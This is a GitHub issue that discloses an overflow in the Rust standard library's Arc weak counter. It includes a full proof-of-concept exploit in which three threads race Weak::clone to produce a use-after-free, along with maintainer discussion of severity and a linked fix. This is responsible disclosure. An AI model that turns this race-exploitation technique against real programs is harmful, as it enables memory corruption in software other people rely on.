Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Overflow in Arc #108706

Closed
Tracked by #10
noamtashma opened this issue Mar 3, 2023 · 10 comments · Fixed by #108708
Closed
Tracked by #10

Overflow in Arc #108706

noamtashma opened this issue Mar 3, 2023 · 10 comments · Fixed by #108708
Assignees
Labels
A-atomic Area: Atomics, barriers, and sync primitives C-bug Category: This is a bug. I-unsound Issue: A soundness hole (worst kind of bug), see: https://en.wikipedia.org/wiki/Soundness P-low Low priority T-libs Relevant to the library team, which will review and decide on the PR/issue.

Comments

@noamtashma
Copy link
Contributor

noamtashma commented Mar 3, 2023

I discovered a memory safety vulnerability in the standard library's Arc.

Before the rest of the issue, I just want to say thanks in advance to everyone involved for helping to keep rust safe 🦀 :)

Description of the vulnerability:

In Weak::clone, the weak count is incremented using fetch_add, and then it's checked whether the result passed MAX_REFCOUNT. As is documented in Arc::clone's code, this is because if the counter gets too close to overflowing, the overflow might happen before the call to abort completes, breaking Arc's invariants and probably causing UB. Checking if the counter passed MAX_REFCOUNT means that at least 2^15 (in 16-bit platforms) increments to the counter before abort completes are needed for an overflow.

However, in Arc::downgrade, the code increments the weak count, without checking that the counter doesn't pass MAX_REFCOUNT . This allows the counter to get all the way up to usize::MAX - 1. Then, using Weak::clone, we can get a much more favorable race than intended.

Therefore, the attack is as follows:

We use Arc::downgrade to increment the weak count all the way to usize::MAX - 1, then run Weak::clone three times in parallel.
The first two will call abort, but the third will result in a weak count of 1, indicating that there are no remaining Weaks (while there actually are).
Then we can abuse this broken invariant to cause UB, for example through Arc::get_mut, as long as we manage to do so before either of the two abort calls complete.

Demonstration of the vulnerability:

Note than to run this exploit yourself, if you're running a 64-bit architecture, the exploit won't run in a reasonable length of time. So Arc has to be modified to lower the counter to 32-bits, to demonstrate the vulnerability.

The exploit in code

type Counter = usize;

fn exploit() {
    println!("Started!");
    use std::boxed::Box;
    use std::sync::*;
    // use crate::sync::atomic::{AtomicBool, Ordering};

    let arc = Arc::new(Box::new(7));

    // Keep one of the weaks alive
    let weak = Arc::downgrade(&arc);

    // The weak count starts at `1`.
    // Increase to `Counter::MAX - 1`.
    for i in 0..Counter::MAX - 3 {
        std::mem::forget(Arc::downgrade(&arc));
        if i % 100000000 == 0 {
            println!("{i} out of {}", Counter::MAX);
        }
    }

    let mutex_arc = std::sync::Mutex::new(Some(arc));

    println!("Finished incrementing");

    // let start = AtomicBool::new(false);

    // We run this function three times in parallel, to trigger our vulnerability.
    let evil = || {
        let id = std::thread::current().id();

        // You can try this if some extra syncronization is wanted, to make all three threads
        // start at the approximately same time. I didn't end up needing it, so I don't know if it even helps.
        // loop {
        //     if start.load(Ordering::Relaxed) {
        //         break;
        //     }
        // }
        let weak2 = weak.clone();
        println!("{id:?}: Managed to clone!");
        // Take the `Arc`
        let arc = mutex_arc.lock().unwrap().take();
        let Some(mut arc) = arc else {
            println!("{id:?}: Error: Arc already taken!");
            return;
        };
        println!("{id:?}: Arc taken!");
        // This will succeed even though we still have a `Weak`
        let Some(val) = Arc::get_mut(&mut arc) else {
            println!("{id:?}: Error: Failed to get unique access :(");
            return; // Didn't manage to exploit :(
        };
        println!("{id:?}: Succeeded!");

        let arc2 = weak2.upgrade().unwrap();
        let also_val = &**arc2;
        // `val` and `also_val` point to the same value.
        println!("{id:?}: also_val: {also_val}");
        **val = 9;
        println!("{id:?}: also_val: {also_val}");
        *val = Box::new(5);
        // Now `also_val` points to freed memory
        println!("{id:?}: also_val: {also_val}");
    };

    std::thread::scope(|s| {
        let _ = s.spawn(evil);
        let _ = s.spawn(evil);
        let _ = s.spawn(evil);
        // let _ = s.spawn(|| {
        //     start.store(true, Ordering::Relaxed);
        // });
    });

    println!("Done.\n\n\n");
}

Running on 64-bit architectures

This is how I tested the exploit myself. I modified the `std` so that the counter would only be a `u32`, and ran the exploit as a "test", with this command:

> ./x.py --stage 0 test library/alloc --test-args "exploit --nocapture"

This is also present here.

Fixing:

The fix is very simple. In the Arc::downgrade compare-exchange loop, add a check that if cur > MAX_REFCOUNT, and it's not usize::MAX, panic.
Add a comment explaining that not straying too much above MAX_REFCOUNT is a global invariant, and must be enforced in all increment operations.

Severity:

I'm not sure how severe it is, since it depends on a race with abort, and I don't know how to assess winning this race in real code on different platforms.

It should also be noted that in order for this to be exploited, a large amount of Weaks need to be leaked (depending on usize size), without also leaking heap memory (otherwise the program would run out of memory first).

@noamtashma noamtashma added the C-bug Category: This is a bug. label Mar 3, 2023
@noamtashma noamtashma changed the title Unsoundness in Arc [I-unsound] Unsoundness in Arc Mar 3, 2023
@workingjubilee workingjubilee changed the title [I-unsound] Unsoundness in Arc Over/underflow in Arc Mar 3, 2023
@workingjubilee workingjubilee added T-libs Relevant to the library team, which will review and decide on the PR/issue. A-atomic Area: Atomics, barriers, and sync primitives labels Mar 3, 2023
@workingjubilee workingjubilee added the I-prioritize Issue: Indicates that prioritization has been requested for this issue. label Mar 3, 2023
@noamtashma
Copy link
Contributor Author

I've opened a pull request here

@Noratrieb
Copy link
Member

Noratrieb commented Mar 3, 2023

@rustbot assign @noamtashma

@rustbot

This comment was marked as outdated.

@workingjubilee
Copy link
Member

workingjubilee commented Mar 3, 2023

I must stress that our 16-bit targets do not support "atomics" indeed, they barely support math on larger types, so the hypothetical ability to exploit this on them is not actually present.

@rustbot

This comment was marked as outdated.

@noamtashma noamtashma changed the title Over/underflow in Arc Overflow in Arc Mar 3, 2023
@noamtashma
Copy link
Contributor Author

noamtashma commented Mar 3, 2023

(I changed the title because this issue is about an overflow - I don't think there's an underflow issue as well)

@workingjubilee
Copy link
Member

There was some discussion about whether I-unsound should be added to this. I have personally declined to add I-unsound because the last time I did so I started a huge debate as it was explained to me, while this does allow a use-after-free, this can only be done during the microseconds the program is being concurrently terminated. While we should still fix this, the broken invariants will be closed over by process death, one way or another. 🦀 🔪

@noamtashma
Copy link
Contributor Author

I wanted to add I-unsound, since I think an RCE during that time window can still be a serious vulnerability.
(Or, I wonder if it might be possible that, after gaining control of a thread, a hacker could also gain control of the other thread and prevent the abort from actually happening?)

Especially since rust doesn't have much control over the system's abort duration, or any detail for that matter.

IMO the main thing stopping this from being severe is that, to be vulnerable your code must leak a lot of values, without leaking actual heap space. Or that the attacker wouldn't be able to have a lot of close calls to Arc functions in order to win the race.
But since being unsound means that "adversarial" safe code can be unsafe, I don't think that's a relevant reason not to tag this as unsoundness.

@cuviper
Copy link
Member

cuviper commented Mar 4, 2023

"adversarial" safe code can be unsafe,

From the security perspective, I just want to emphasize that "adversarial" should be considered non-literal -- source code is generally considered within the trust boundary, and if that's ever not the case then you need an entire sandboxing solution for both compilation and execution.

@m-ou-se
Copy link
Member

m-ou-se commented Mar 6, 2023

I do think it's accurate to classify this as an unsoundness bug, even though it's very low risk. Let's mark it as I-unsound with P-low for now.

@m-ou-se m-ou-se added P-low Low priority I-unsound Issue: A soundness hole (worst kind of bug), see: https://en.wikipedia.org/wiki/Soundness labels Mar 6, 2023
@apiraino apiraino removed the I-prioritize Issue: Indicates that prioritization has been requested for this issue. label Mar 7, 2023
matthiaskrgr added a commit to matthiaskrgr/rust that referenced this issue Mar 11, 2023
…u-se

Prevent overflow through Arc::downgrade

Fixes rust-lang#108706
@bors bors closed this as completed in 5adaa71 Mar 11, 2023
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
A-atomic Area: Atomics, barriers, and sync primitives C-bug Category: This is a bug. I-unsound Issue: A soundness hole (worst kind of bug), see: https://en.wikipedia.org/wiki/Soundness P-low Low priority T-libs Relevant to the library team, which will review and decide on the PR/issue.
Projects
None yet
Development

Successfully merging a pull request may close this issue.

7 participants